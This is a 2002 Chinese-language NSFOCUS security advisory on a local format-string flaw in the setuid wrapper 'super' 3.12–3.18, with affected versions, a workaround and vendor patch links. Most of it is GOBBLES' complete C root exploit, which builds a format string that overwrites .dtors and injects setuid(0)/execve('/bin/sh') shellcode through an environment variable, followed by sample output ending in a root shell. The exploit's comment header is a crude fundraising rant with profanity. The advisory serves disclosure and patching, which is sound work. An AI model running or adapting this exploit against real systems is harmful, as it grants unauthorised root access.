首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第34期->最新漏洞
期刊号: 类型: 关键词:
William Deich Super SysLog本地格式串溢出漏洞

日期:2002-08-16

发布日期:2002-07-31
更新日期:2002-08-09

受影响系统:
William Deich super 3.18
William Deich super 3.17
William Deich super 3.16
William Deich super 3.12
不受影响系统:
William Deich super 3.19
描述:
---------------------------------------------------------------------
BUGTRAQ  ID: 5367

Super允许管理员对文件进行访问控制和用户功能进行控制,类似Sudo。

Super由于错误的使用了记录错误信息的syslog()函数,本地攻击者可以利用这个漏洞进行格式字符串攻击。

Super默认以suid root属性安装,Super使用配置文件来控制用户是否能使用其他用户权限执行代码,如果用户不在配置文件中执行Super,Super将使用syslog(3)来记录错误信息,代码如下:

From error.c
...
#define SysLog(pri, buf) syslog((pri), (buf))
...
SysLog(error_priority, buf);
...

syslog的格式化串可以由用户来控制,攻击者可以构建恶意格式字符串导致syslog函数崩溃,精心构建格式化串数据可导致写内存任意位置而以root用户权限在系统中执行任意指令。

<*来源:GOBBLES (gobbles@hushmail.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102812622416695&w=2
*>

测试方法:
----------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GOBBLES(gobbles@hushmail.com) 提供了如下测试程序:

/*
* SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
*
* When GOBBLES say he and he security team
* are non-profit. He really mean NON-profit.
* This means GOBBLES and he GOBBLES Security
* Labs (GSL) friends do not have much funds.
*
* GOBBLES was hoping to receive the money
* for speaking at the defcon gathering of
* security enthusiasts up front. So he could buy
* and pay for he ticket to Las Vegas from the great city
* of Baltimore where he currently resides.
*
* GOBBLES is not selling out.  GOBBLES is just admitting that he
* need your help.  Please, help GOBBLES!
*
* After many e-mails to defcon organisers it became
* apparent to GOBBLES this was not going to happen.
* This mean GOBBLES has no way of getting to defcon.
* This also mean GOBBLES cannot deliver he talk that
* are named "Wolves among us". Alot of time and work
* went into the preperation of this talk and it was
* to be the grand finale of the year of the turkey
* (2002). With many new 0-day to give out and many
* great anouncements to be made.
*
* Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com)
* you, the defcon attendee, may very well get cheated out
* of attending one of the most provocative and daring
* events defcon history has ever seen.
*
*     !!! ITS NOT TOO LATE..BUT HURRY !!!
*
* Help GOBBLES go to defcon. GOBBLES give so much to
* the community..is it not time the community now help
* a poverty stricken turkey to spread his wings and fly
* towards fame and glory?
*
* Reasons why you should help GOBBLES get to defcon:
*  
* -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
*
* -- Seeing GOBBLES present naked: Priceless.
*
* -- Zeroday (possible hardcover) GOBBLES comic
*
* -- A chance to buy GOBBLES art
*
* -- A chance to receive _free_ GOBBLES T-shirts
*
* -- Copies of those exploits you couldn't code
*
*
* What does GOBBLES need?
*
* Basically GOBBLES need to round up 300 US dollars before saturday.
* "Wolves among us" is sheduled for the last day of defcon.
* Namely 3PM on Sunday August 4th. As you can very well imagine
* this talk was going to blow the lid off of more dirty secrets
* than there are noodles in China. With your help GOBBLES can still
* make this happen. So what GOBBLES is asking for is a little helping
* hand from the community. If anyone has the funds to sponsor GOBBLES
* to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
*
*     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
*
* GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
* beyond the amount needed for travel to Vegas and back.  GOBBLES is not
* selling out, GOBBLES is asking help from those penetrators and researchers
* that GOBBLES helps every day.
*
* In other news, ISS rejected GOBBLES request for a job application.  It
* seems that they're afraid of getting scalp'd.
*
*                  Political statement:
* HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
* PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
*
* FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN  
* JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
* FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
*/

/*
* GOBBLES-own-super.c
*  -- root exploit for root hole in root wrapper
*
* Super is sudo wannabe that boasts much security.
* GOBBLES think people who write setuid wrappers
* should learn to program securely before opening
* big hoohoo about how secure program is.
*
* Current super version (3.18):
   -- ftp://ftp.ucolick.org/pub/users/will/
*
* Super maintainer say following about he code:
*
* "Super allows an admin to control access to files
*  and functions for users. It is similar to sudo, but
*  uses a different approach in the configuration file."
*
* Problem:
*
* When super is compiled to use syslog(3) for its logging
* of error messages the following lines makes pre-auth
* local root exploitation rather trivial:
*
* From error.c
* ...
* #define SysLog(pri, buf) syslog((pri), (buf))
* ...
* SysLog(error_priority, buf);
* ...
*
* This means users that are not in the super config file
* will be able to execute code with root priviledges.
*
* "Super acts as a SetUID wrapper around system commands
*  to make sure the commands are executed safely, and
*  only by authorized users."
*
*         hehehe ;PPpPPPPp
*
* Love,
* GOBBLES
* GOBBLES@hushmail.com
*
* Official site: http://www.bugtraq.org
* Official mirror: http://www.immunitysec.com/GOBBLES/
*/

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super  
$ ./GOBBLES-own-super

Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
8063f7c ffffffff 00000000                    ........        

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx個%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN        2
#define DPA        29    

#define SUPER        "/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
    unsigned long t, w;
    int dpa, allign, shift = 0;
    char c, *store;    

    if(argc == 1) {
        fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
        exit(0);
    }
    
    allign = ALLIGN;
    dpa = DPA;
    
    while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
        switch(c) {
            case 't':
                sscanf(optarg, "%p", &store);
                t = (long)store;
                 t += 4;
                break;
            case 'o':
                dpa = atoi(optarg);
                break;
            case 'A':
                allign = atoi(optarg);
                break;
            default:
                fprintf(stderr, "hehehe ;PPppPPPp\n");
                exit(0);
        }
    }
    
    store = NULL;

    if((store = getenv("GOBBLES")) == NULL) {
        stuff();
        if(execve(argv[0], argv, environ)) {
            fprintf(stderr, ". problem re-executing\n");
            exit(1);
        }
    }
    
    w = (long)store;
    // shift is signed so this works both ways
    shift = (strlen(argv[0]) - strlen(SUPER));
    w += shift;
    
    fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);
            
    buildstring(t, w, dpa, allign);
    
    if(execl(SUPER, "super", string, NULL)) {
        fprintf(stderr, "error executing\n");
        exit(1);
    }
}

void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
    unsigned int un, deux, x, b[4], namelen;
    char a_buf[4];
    struct passwd *pass;    

    memset(string, '\0', sizeof(string));
    memset(a_buf, '\0', sizeof(a_buf));
    
    if((pass = getpwuid(getuid())) == NULL) {
        fprintf(stderr, ". can't find your username\n");
        exit(1);
    }

    namelen = strlen(pass->pw_name);

    fprintf(stderr, ". username: %d bytes\n", namelen);

    for(x = 0; x < allign && x < sizeof(a_buf); x++)
        a_buf[x] = 'x';

    b[0] = (t & 0x000000ff);
    b[1] = (t & 0x0000ff00) >> 8;
    b[2] = (t & 0x00ff0000) >> 16;
    b[3] = (t & 0xff000000) >> 24;

    un = (w >> 16) & 0xffff;
    deux = w & 0xffff;

    if(un < deux) {
                snprintf(string, sizeof(string)-1,
            "%s"
            "%c%c%c%c%c%c%c%c"  
            "%%.%hdx" "%%%d$hn"
            "%%.%hdx" "%%%d$hn",
                        a_buf,
            b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen),
            dpa, deux - un, dpa + 1
            
        );
        }
        else {
                snprintf(string, sizeof(string)-1,
            "%s"
            "%c%c%c%c%c%c%c%c"
            "%%.%hdx" "%%%d$hn"
            "%%.%hdx" "%%%d$hn",
                        a_buf,
            b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen),
            dpa, un-deux, dpa + 1
            
        );
        }
}

void  
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
    "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
    setenv("GOBBLES", code, 1);
}

建议:
---------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时去掉程序Super的setuid位属性。

厂商补丁:

William Deich
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:


William Deich super 3.12:

Debian Upgrade super_3.12.2-2.1_sparc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_sparc.deb
Debian 2.2 sparc.

Debian Upgrade super_3.12.2-2.1_powerpc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_powerpc.deb
Debian 2.2 PPC.

Debian Upgrade super_3.12.2-2.1_m68k.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_m68k.deb
Debian 2.2 m68k.

Debian Upgrade super_3.12.2-2.1_i386.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_i386.deb
Debian 2.2 i386.

Debian Upgrade super_3.12.2-2.1_arm.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_arm.deb
Debian 2.2 ARM.

Debian Upgrade super_3.12.2-2.1_alpha.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_alpha.deb
Debian 2.2 Alpha.

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz

William Deich super 3.16:

Debian Upgrade super_3.16.1-1.1_sparc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_sparc.deb
Debian 3.0.

Debian Upgrade super_3.16.1-1.1_powerpc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_powerpc.deb
Debian 3.0 PPC.

Debian Upgrade super_3.16.1-1.1_mipsel.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_mipsel.deb
Debian 3.0 MIPS (little endian).

Debian Upgrade super_3.16.1-1.1_mips.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_mips.deb
Debian 3.0 MIPS.

Debian Upgrade super_3.16.1-1.1_m68k.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_m68k.deb
Debian 3.0 m68k.

Debian Upgrade super_3.16.1-1.1_hppa.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_hppa.deb
Debian 3.0 HPPA.

Debian Upgrade super_3.16.1-1.1_ia64.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_ia64.deb
Debian 3.0 IA64.

Debian Upgrade super_3.16.1-1.1_i386.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_i386.deb
Debian 3.0 i386.

Debian Upgrade super_3.16.1-1.1_alpha.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_alpha.deb
Debian 3.0 Alpha.

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz

William Deich super 3.17:

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz

William Deich super 3.18:

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz
版权所有,未经许可,不得转载